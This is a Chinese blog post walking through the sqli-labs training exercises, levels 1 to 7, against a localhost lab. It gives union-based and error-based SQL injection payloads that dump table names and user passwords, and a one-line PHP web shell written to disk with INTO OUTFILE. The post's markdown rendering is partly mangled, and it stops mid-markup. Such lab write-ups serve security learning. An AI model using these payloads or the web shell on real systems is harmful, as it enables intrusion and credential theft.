<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl">
  
  
  
  
  <title>Star_Cheng的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="1.level-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 构造?id=数字’后发现报错，说明存在SQL注入：    在单引号后面加入#的url编码后页面显示正常，写出几个常用的：空格是%20，单引号是%27，井号是%23，双引号是%22      接下来猜解字段的数目，使用order by语句，使用order by">
<meta property="og:type" content="article">
<meta property="og:title" content="Star_Cheng的博客">
<meta property="og:url" content="http://yoursite.com/2018/11/26/sqli-lab(1-10)(1)/index.html">
<meta property="og:site_name" content="Star_Cheng的博客">
<meta property="og:description" content="1.level-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 构造?id=数字’后发现报错，说明存在SQL注入：    在单引号后面加入#的url编码后页面显示正常，写出几个常用的：空格是%20，单引号是%27，井号是%23，双引号是%22      接下来猜解字段的数目，使用order by语句，使用order by">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/558A408AB82F496BB026008000413B0D/4414">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/6CD8F28C1F6D4386857E50CB6B111082/4419">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/D7E5A9D7D23149A7B5FA9E7B0352BB91/4421">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/2288E506BC7B405C92F1EC76FD5663C7/4425">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/C16E0386666E4932BE1D27C2C00340EA/4420">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/070E58FF5F2E49E5B465271727982593/4422">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/204597D742A2418CA81D7AE694E19413/4426">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/954C506AA5F243E9AB42347ABF533AC2/4423">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/C0CAF574597C47318D32C1611ADE2F18/4416">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/BAE7C7F8EF924262B7470B2FCB68B959/4417">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/BE395A607FBA4159944DD2FC91E4E808/4415">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/1C5217B34DA84064A914D8601FE8D448/4418">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/D394D877D4C54AD1800009CDB591BEE9/4412">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/5FD5BB60E40946C6B89BEE1561F6F1B1/4411">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/77142EDB338D4E2AB4143D8D301E4AF8/4413">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/F6C6CADED45C4D949FAF84F8031C54A2/4471">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/BCFDA032C5C4409B8B9AB69D72A9B187/4473">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/4CB82ADCB48D4D3F8B868CEC8BF8302E/4481">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/DE5558657C734B848001492AB4287843/4492">
<meta property="og:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/5FBEAEECACA143C8A03B0206CB86FF7A/6223">
<meta property="og:updated_time" content="2018-07-30T06:03:39.194Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Star_Cheng的博客">
<meta name="twitter:description" content="1.level-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 构造?id=数字’后发现报错，说明存在SQL注入：    在单引号后面加入#的url编码后页面显示正常，写出几个常用的：空格是%20，单引号是%27，井号是%23，双引号是%22      接下来猜解字段的数目，使用order by语句，使用order by">
<meta name="twitter:image" content="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/558A408AB82F496BB026008000413B0D/4414">
  
    <link rel="alternative" href="/atom.xml" title="Star_Cheng的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.jpg">
  
  
  <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>

        <a href="/" class="profilepic">
            
            <img lazy-src="/img/4.jpg" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Star_Cheng</a></h1>
        </hgroup>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder="搜索一下" autocomplete="off">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/categories/开发工具/">玩转开发工具</a></li>
                        
                            <li><a href="/categories/digital">随笔</a></li>
                        
                            <li><a href="/categories/algorithm">算法学习</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github" target="_blank" href="/xxxxx" title="github">github</a>
                            
                                <a class="fl weibo" target="_blank" href="/xxxxxxxx" title="weibo">weibo</a>
                            
                                <a class="fl rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        
                    </div>
                </section>
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.csdn.net/baidu_21483933">csdn</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://segmentfault.com/blog/maocg_web">segmentfault</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.jianshu.com/users/eb37ef89c746/latest_articles">简书</a>
                    
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">爱动漫,爱游戏,爱编程,爱运动,爱的太多了!</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Star_Cheng</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/4.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Star_Cheng</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/categories/开发工具/">玩转开发工具</a></li>
                
                    <li><a href="/categories/digital">随笔</a></li>
                
                    <li><a href="/categories/algorithm">算法学习</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="/xxxxx" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="/xxxxxxxx" title="weibo">weibo</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>
    </div>
</nav>
      <div class="body-wrap"><article id="post-sqli-lab(1-10)(1)" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2018/11/26/sqli-lab(1-10)(1)/" class="article-date">
      <time datetime="2018-11-26T08:56:10.858Z" itemprop="datePublished">2018-11-26</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h3 id="1-level-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入"><a href="#1-level-1-GET-Error-based-Single-quotes-String-基于错误的GET单引号字符型注入" class="headerlink" title="1.level-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)"></a>1.level-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)</h3><ul>
<li>构造?id=数字’后发现报错，说明存在SQL注入：</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/558A408AB82F496BB026008000413B0D/4414" alt=""></p>
<ul>
<li>在单引号后面加入#的url编码后页面显示正常，写出几个常用的：空格是%20，单引号是%27，井号是%23，双引号是%22  </li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/6CD8F28C1F6D4386857E50CB6B111082/4419" alt=""></p>
<ul>
<li>接下来猜解字段的数目，使用order by语句，使用order by 3，页面返回正常，使用order by 4页面出错，说明字段的数目为3</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/D7E5A9D7D23149A7B5FA9E7B0352BB91/4421" alt=""></p>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/2288E506BC7B405C92F1EC76FD5663C7/4425" alt=""></p>
<ul>
<li>使用union查询，但是却发现2,3不出现，查看源代码发现，原来mysql_fetch_array只被调用了一次，而mysql_fetch_array从结果集中取得一行作为关联数组或数字数组或二者兼有，具体看第二个参数是什么。所以这里无论怎么折腾最后只会出来第一行的查询结果。</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/C16E0386666E4932BE1D27C2C00340EA/4420" alt=""></p>
<ul>
<li>我们只要想办法让union左边的查询语句为空，那么union右边的查询结果就会变成第一行并打印出来</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/070E58FF5F2E49E5B465271727982593/4422" alt=""></p>
<ul>
<li>但是只要2,3的位置用来查询信息，效率有些低，我们可以使用数据库连接函数concat和concat_ws,其中concat_ws的第一个参数是连接字符串的分隔符。</li>
<li>MySQL的concat函数可以连接一个或者多个字符串，且如果有一个字符为null，结果就返回null，如：</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/204597D742A2418CA81D7AE694E19413/4426" alt=""></p>
<ul>
<li>concat_ws()函数, 表示concat with separator,即有分隔符的字符串连接如连接后以_分隔,和concat不同的是, concat_ws函数在执行的时候,不会因为NULL值而返回NULL且第一个字符是连接符：  </li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/954C506AA5F243E9AB42347ABF533AC2/4423" alt=""></p>
<ul>
<li>其中<blockquote>
<p>user():返回当前数据库连接使用的用户<br>database():返回当前数据库连接使用的数据库<br>version():返回当前数据库的版本  </p>
</blockquote>
</li>
<li>演示一下分别使用concat和concat_ws，分隔符使用char()，32为空格，58为冒号，124为|，也可以使用16进制的形式</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/C0CAF574597C47318D32C1611ADE2F18/4416" alt="">  </p>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/BAE7C7F8EF924262B7470B2FCB68B959/4417" alt=""></p>
<ul>
<li>我们可以看到爆出的数据库名为security，接着爆出该数据库下的表，使用where语句值不能直接用英文，要用单引号包裹着，当然用十六进制表示也可以，配合着limit使用可以逐个爆出表</li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/BE395A607FBA4159944DD2FC91E4E808/4415" alt="">  </p>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/1C5217B34DA84064A914D8601FE8D448/4418" alt=""></p>
<ul>
<li>但是通过使用limit来逐个爆出的效率有点低，我们引入一个新的方法group_concat(),即可高效爆出表，并且以逗号最为分隔符<br><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/D394D877D4C54AD1800009CDB591BEE9/4412" alt=""></li>
</ul>
<ul>
<li>我们一般只需获得user的消息，所以我们接着使用此方法爆出user表下的列： </li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/5FD5BB60E40946C6B89BEE1561F6F1B1/4411" alt=""></p>
<ul>
<li>接着我们照样一口气爆出该表下的所有字段内容  </li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/77142EDB338D4E2AB4143D8D301E4AF8/4413" alt=""></p>
<h3 id="2-less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入"><a href="#2-less-2-GET-Error-based-Intiger-based-基于错误的GET整型注入" class="headerlink" title="2.less-2 GET - Error based - Intiger based (基于错误的GET整型注入)"></a>2.less-2 GET - Error based - Intiger based (基于错误的GET整型注入)</h3><ul>
<li>输入单引号出现报错，输入%23还是报错，根据源码分析，该注入类型为数字型。<br>步骤与第一关类似，我直接上最后一步：  </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less-2/?id=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from  users limit 0,1 %23  </span><br><span class="line">或者  </span><br><span class="line">http://localhost/sqli-labs/Less-2/?id=0 union select 1,2,group_concat(id,char(32,124,32),database(),char(32,124,32),password) from  users%23</span><br></pre></td></tr></table></figure>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/F6C6CADED45C4D949FAF84F8031C54A2/4471" alt=""><br><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/BCFDA032C5C4409B8B9AB69D72A9B187/4473" alt="">  </p>
<h3 id="3-less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入"><a href="#3-less-3-GET-Error-based-Single-quotes-with-twist-string-基于错误的GET单引号变形字符型注入" class="headerlink" title="3.less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)"></a>3.less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)</h3><ul>
<li>当我们输入单引号的时候，报错中出现了一个括号，看来此处的变形为），再根据源码分析，确实如此： </li>
</ul>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/4CB82ADCB48D4D3F8B868CEC8BF8302E/4481" alt="">  </p>
<p><img src="https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/DE5558657C734B848001492AB4287843/4492" alt="">   </p>
<p>构造payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less-3/?id=0&apos;) union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 4,1 %23</span><br><span class="line">```  </span><br><span class="line"></span><br><span class="line">### 4.less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）  </span><br><span class="line">* 尝试加入单引号，没有报错，但是在加入双引号后报错且需要加入括号，单引号没有报错的原因是PHP中双引号可以包含单引号  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/0BD256ED3A1248139C523EF6104F2ECB/4496)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/4F1FD36DDA1947DB9F53095B957F78C1/4498)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload如下：</span><br></pre></td></tr></table></figure></p>
<p><a href="http://localhost/sqli-labs/Less-4/?id=0&quot;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-4/?id=0&quot;</a>) union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 4,1 %23<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">### 5.less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)  </span><br><span class="line">  </span><br><span class="line"></span><br><span class="line">参考资料如下：</span><br><span class="line">https://www.2cto.com/article/201303/192718.html  </span><br><span class="line"></span><br><span class="line">https://www.2cto.com/article/201604/498394.html  </span><br><span class="line"></span><br><span class="line">http://www.moonsec.com/post-314.html</span><br><span class="line"></span><br><span class="line">* 构造payload：</span><br></pre></td></tr></table></figure></p>
<p><a href="http://localhost/sqli-labs/Less-5/?id=0&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-5/?id=0&#39;</a>  union select count(<em>),2,concat(‘~’,(select database()),’~’,(floor(rand(0)</em>2)))as x from information_schema.tables group by x %23<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/29CC778E98984B5B976F5D75E43798A7/4540)</span><br><span class="line"></span><br><span class="line">（为了让结果变清晰，我加了分隔符&apos;~&apos;)</span><br><span class="line"></span><br><span class="line">* 接着查询表名：</span><br></pre></td></tr></table></figure></p>
<p><a href="http://localhost/sqli-labs/Less-5/?id=0&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-5/?id=0&#39;</a>  union select count(<em>),2,concat(‘~’,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),’~’,(floor(rand(0)</em>2)))as x from information_schema.tables group by x %23<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"></span><br><span class="line">* 接着查询列名：</span><br></pre></td></tr></table></figure></p>
<p><a href="http://localhost/sqli-labs/Less-5/?id=0&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-5/?id=0&#39;</a>  union select count(<em>),2,concat(‘~’,(select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 1,1),’~’,(floor(rand(0)</em>2)))as x from information_schema.tables group by x %23<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/3073F95A420045EDAB5F59428A70C0DB/4552)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">* 最后爆出字段内容：</span><br></pre></td></tr></table></figure></p>
<p><a href="http://localhost/sqli-labs/Less-5/?id=0&#39;" target="_blank" rel="noopener">http://localhost/sqli-labs/Less-5/?id=0&#39;</a>  union select count(<em>),2,concat(‘~’,(select password from users limit 1,1),’~’,(floor(rand(0)</em>2)))as x from information_schema.tables group by x %23<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/510119F856BC4B96880D06F4E764C0AB/4556)</span><br><span class="line"></span><br><span class="line">### 解法二： </span><br><span class="line">使用派生表的方法先爆数据库名： </span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; union select 1 from (select count(*),concat(&apos;~&apos;,(select database()),&apos;~&apos;,(floor(rand(0)*2)))as x from information_schema.tables group by x)a%23  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/57CED3FF035C411CB7BFED7D9B1AAA68/4728)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">接着爆表名：  </span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; union select 1 from (select count(*),concat(&apos;~&apos;,(select table_name from information_schema.tables where table_schema=database() limit 0,1),&apos;~&apos;,(floor(rand(0)*2)))as x from information_schema.tables group by x)a%23  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/A0FE5A3AD4104FEF822B21FFA7453A31/4731)  </span><br><span class="line"></span><br><span class="line">接着爆列名：  </span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; union select 1 from (select count(*),concat(&apos;~&apos;,(select column_name from information_schema.columns where table_schema=database() and table_name=&apos;users&apos;limit 0,1),&apos;~&apos;,(floor(rand(0)*2)))as x from information_schema.tables group by x)a%23 </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/C8CFE6BC81D8465182D4DE6634283862/4733)</span><br><span class="line"></span><br><span class="line">最后爆账号和密码：  </span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; union select 1 from (select count(*),concat(&apos;~&apos;,(select concat_ws(&apos;::&apos;,id,username,password) from users limit 1,1),&apos;~&apos;,(floor(rand(0)*2)))as x from information_schema.tables group by x)a%23  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/4BA5C2598A794B91B7AB47DDF832FE49/4735)  </span><br><span class="line"></span><br><span class="line">### 其它报错注入式利用方法：  </span><br><span class="line">①使用extractvalue</span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; and extractvalue(1,concat(&apos;~&apos;,(select database()),&apos;~&apos;));%23    </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/FFD0AF2E948B4C1388D81AD477D83DAE/4742)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">②使用UpdateXml  </span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; and 1=(updatexml(1,concat(&apos;~&apos;,(select database()),&apos;~&apos;),1))%23  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/C6F4DC2B56E2453E8A86509A0B936BAA/4758)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">③使用name_const()  </span><br><span class="line">&gt;http://localhost/sqli-labs/Less-5/?id=1&apos; and 1=(select * from (select name_const(version(),1),name_const(version(),1))b)%23  </span><br><span class="line"></span><br><span class="line">![](https://note.youdao.com/yws/public/resource/d16f71bd0704844f19a2e1165db52575/xmlnote/D711794C88814B5D8C7DA4F059FF2ABD/4763)  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">### less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)  </span><br><span class="line"></span><br><span class="line">第六关与第五关差不多，将1&apos;的单引号换成双引号就可以了   </span><br><span class="line"></span><br><span class="line">### less-7 GET - Dump into outfile - String （导出文件GET字符型注入）   </span><br><span class="line"></span><br><span class="line">导出文件就是可以将查询的结果导出到一个文件中，比较常见的是将一句话木马导入到一个php文件中。常用的语句：</span><br></pre></td></tr></table></figure></p>
<p>select “&lt;?php @eval($_POST[‘Star_Cheng’]);?&gt;” into outfile “XXX\XXX/php”<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span 